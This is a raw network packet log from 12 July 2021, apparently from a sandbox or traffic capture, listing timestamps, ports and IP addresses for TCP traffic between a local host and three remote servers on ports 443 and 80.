Jul 12, 2021 10:28:55.290762901 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.290781021 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.290828943 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.296015978 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.296076059 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.296089888 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.296133041 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.301217079 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.301254988 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.301282883 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.301309109 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.306134939 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.306169987 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.306190968 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.306216002 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.311152935 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.311184883 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.311217070 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.311247110 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.316216946 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.316255093 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.316287041 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.316313028 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.320802927 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.320862055 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.320863008 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.320900917 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.325946093 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.325982094 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.326014042 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.326045990 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.330966949 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.331001043 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.331029892 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.331058025 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.335824013 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.335863113 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.335922956 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.341217041 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.341249943 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.341289043 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.341330051 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.345644951 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.345701933 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.345710039 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.345750093 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.350260973 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.350296974 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.350321054 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.350342989 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.354898930 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.354938984 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.354979992 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.355007887 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.359536886 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.359577894 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.359642029 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.364099979 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.364139080 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.364156008 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.364190102 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.368820906 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.368876934 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.368879080 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.368920088 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.373330116 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.373388052 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.373413086 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.373528957 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.377896070 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.377948046 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.377948999 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.377991915 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.383192062 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.383229971 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.383250952 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.383275032 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.386770964 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.386804104 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.386827946 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.386851072 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.391211033 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.391246080 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.391275883 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.391308069 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.395737886 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.395792007 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.395831108 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.395868063 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.400134087 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.400213957 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.400266886 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.400314093 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.404624939 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.404660940 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.404684067 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.404707909 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.409092903 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.409130096 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.409235001 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.409259081 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.442434072 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.452596903 CEST	49727	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.671948910 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.681978941 CEST	443	49727	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.682192087 CEST	49727	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.686459064 CEST	49727	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.916167974 CEST	443	49727	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.916210890 CEST	443	49727	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.916322947 CEST	49727	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:56.146584034 CEST	443	49727	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:56.147221088 CEST	49727	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:56.157561064 CEST	49727	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:56.163274050 CEST	49727	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:56.395859957 CEST	443	49727	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:56.405116081 CEST	443	49727	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:56.405378103 CEST	443	49727	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:56.405400038 CEST	443	49727	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:56.405561924 CEST	49727	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:56.406099081 CEST	49727	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:56.406116962 CEST	49727	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:56.637778044 CEST	443	49727	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:56.638087034 CEST	49727	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:57.411650896 CEST	49729	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:57.640007019 CEST	443	49729	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:57.640162945 CEST	49729	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:57.640683889 CEST	49729	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:57.870202065 CEST	443	49729	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:57.870969057 CEST	443	49729	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:57.871042013 CEST	49729	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:58.099400997 CEST	443	49729	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:58.099478960 CEST	49729	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:58.104176998 CEST	49729	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:58.131371021 CEST	49729	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:58.332496881 CEST	443	49729	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:58.359937906 CEST	443	49729	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:58.362907887 CEST	443	49729	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:58.362950087 CEST	443	49729	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:58.363145113 CEST	49729	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:58.365629911 CEST	49729	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:58.663889885 CEST	49729	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:58.891864061 CEST	443	49729	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:11.598768950 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:11.823996067 CEST	443	49740	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:11.824158907 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:11.824930906 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:12.050110102 CEST	443	49740	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:12.051110983 CEST	443	49740	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:12.051279068 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:12.276578903 CEST	443	49740	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:12.276690006 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:12.400706053 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:12.438044071 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:12.438123941 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:12.626142979 CEST	443	49740	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:12.663676977 CEST	443	49740	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:12.663705111 CEST	443	49740	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:12.663712025 CEST	443	49740	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:12.665169001 CEST	443	49740	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:12.665251970 CEST	443	49740	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:12.665275097 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:12.665332079 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:12.665812969 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:12.665868044 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:12.890727043 CEST	443	49740	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:12.891299009 CEST	49740	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:13.641973972 CEST	49742	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:13.869611025 CEST	443	49742	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:13.870002985 CEST	49742	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:13.870548010 CEST	49742	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:14.105195045 CEST	443	49742	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:14.106730938 CEST	443	49742	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:14.107008934 CEST	49742	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:14.336961031 CEST	443	49742	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:14.337066889 CEST	49742	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:14.337779999 CEST	49742	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:14.348949909 CEST	49742	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:14.570846081 CEST	443	49742	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:14.576565981 CEST	443	49742	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:14.863276958 CEST	443	49742	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:14.866624117 CEST	443	49742	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:14.867449045 CEST	49742	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:14.867489100 CEST	49742	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:14.868361950 CEST	49742	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:15.094732046 CEST	443	49742	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:27.690290928 CEST	49744	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:27.926294088 CEST	443	49744	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:27.926536083 CEST	49744	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:27.927481890 CEST	49744	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:28.156552076 CEST	443	49744	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:28.160239935 CEST	443	49744	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:28.160572052 CEST	49744	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:28.393100977 CEST	443	49744	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:28.393238068 CEST	49744	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:28.394139051 CEST	49744	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:28.402915001 CEST	49744	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:28.626425028 CEST	443	49744	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:28.632065058 CEST	443	49744	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:28.637079954 CEST	443	49744	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:28.637145042 CEST	443	49744	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:28.642254114 CEST	49744	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:28.642290115 CEST	49744	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:28.879275084 CEST	443	49744	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:34.528865099 CEST	49746	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:29:34.724894047 CEST	80	49746	47.75.19.154	192.168.2.3
Jul 12, 2021 10:29:34.725092888 CEST	49746	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:29:34.725317955 CEST	49746	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:29:34.919857979 CEST	80	49746	47.75.19.154	192.168.2.3
Jul 12, 2021 10:29:34.919960022 CEST	49746	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:29:35.114739895 CEST	80	49746	47.75.19.154	192.168.2.3
Jul 12, 2021 10:29:35.124300957 CEST	80	49746	47.75.19.154	192.168.2.3
Jul 12, 2021 10:29:35.124344110 CEST	80	49746	47.75.19.154	192.168.2.3
Jul 12, 2021 10:29:35.124365091 CEST	80	49746	47.75.19.154	192.168.2.3
Jul 12, 2021 10:29:35.124388933 CEST	80	49746	47.75.19.154	192.168.2.3
Jul 12, 2021 10:29:35.124404907 CEST	80	49746	47.75.19.154	192.168.2.3
Jul 12, 2021 10:29:35.124428988 CEST	49746	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:29:35.124461889 CEST	49746	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:29:35.124466896 CEST	49746	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:29:35.124737978 CEST	49746	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:29:35.319538116 CEST	80	49746	47.75.19.154	192.168.2.3
Jul 12, 2021 10:29:35.497170925 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.516518116 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.516740084 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.519377947 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.538667917 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.538764000 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.557295084 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.768675089 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.768692970 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.768714905 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.768735886 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.768759012 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.768780947 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.768798113 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.768815041 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.768837929 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.768861055 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.775105953 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.775110006 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.796675920 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.796713114 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.796734095 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.796753883 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.796775103 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.796794891 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.797879934 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.797911882 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.810646057 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.810689926 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.810708046 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.810730934 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.810753107 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.810776949 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.811649084 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.811671972 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.811691999 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.811711073 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.811731100 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.811753035 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.812036037 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.812139988 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.812171936 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.812182903 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.812186003 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.812189102 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.812191963 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.812195063 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.832303047 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.832349062 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.833508015 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.834971905 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.835001945 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.835024118 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.836436033 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.836474895 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.836513042 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.836533070 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.837609053 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.837646961 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.838604927 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.838701963 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.838741064 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.838768005 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.839870930 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.840142012 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.840280056 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.841101885 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.841131926 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.842544079 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.842572927 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.844501019 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.844609022 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.844880104 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.844906092 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.845110893 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.845134974 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.846317053 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.846349001 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.847693920 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.847729921 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.849035978 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.849234104 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.849262953 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.849288940 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.849332094 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.849335909 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.850249052 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.850287914 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.852056980 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.852094889 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.854767084 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.854808092 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.855952978 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.855988979 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.857048988 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.857254028 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.858750105 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.858792067 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.861824036 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.870651007 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.871535063 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.871562958 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.871604919 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.871622086 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.871633053 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.871970892 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.871978998 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.872005939 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872037888 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872087955 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872138977 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872184038 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872226000 CEST	80	49750	47.254.186.176	192.168.2.3
